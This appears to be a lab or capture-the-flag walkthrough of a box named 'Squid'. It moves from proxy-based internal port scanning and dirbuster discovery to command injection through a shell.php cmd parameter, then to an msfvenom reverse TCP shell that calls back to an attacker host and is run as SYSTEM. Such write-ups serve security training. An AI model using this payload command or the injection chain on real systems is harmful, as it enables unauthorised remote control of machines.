🪟Squid

192.168.90.189

Enumeration

Used rustscan to find the initial port then nmap to do a service scan as Nmap scanning this whole box was very slow.

Nmap scan

sudo nmap 192.168.90.189 -Pn -sV -p 3128  

Port 3128

Found Squid 4.14 running on this port.

Found that you can use the proxy to scan the machines internal ports. https://book.hacktricks.xyz/network-services-pentesting/3128-pentesting-squid https://github.com/aancw/spose

Using curl to pull a webpage through the proxy.

curl --proxy http://192.168.90.189:3128 192.168.90.189:8080

Ran dirbuster through the proxy and found some interesting pages. Added a proxy in foxyproxy which let me view the web pages.

Dirbuster found an interesting page.

Page says undefined cmd in shell.php. Which would be using the system function. 😈 Added ?cmd=whoami

Confirmed command injection. Also confirmed this is running as nt authority\system so a reverse shell from here would land straight to root... or nt authority\system.

Made a reverse shell exe with msfvennom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.90 LPORT=6699 --platform windows -a x64 -e x64/xor -f exe -o shell2.exe

Curled the shell onto the machine by cmd injection.

Confirmed the file was there. Had to send shell2.exe after the picture above because I messed up the first msfvenom command.

Ran file by sending the cmd for the exe in the browser.

Root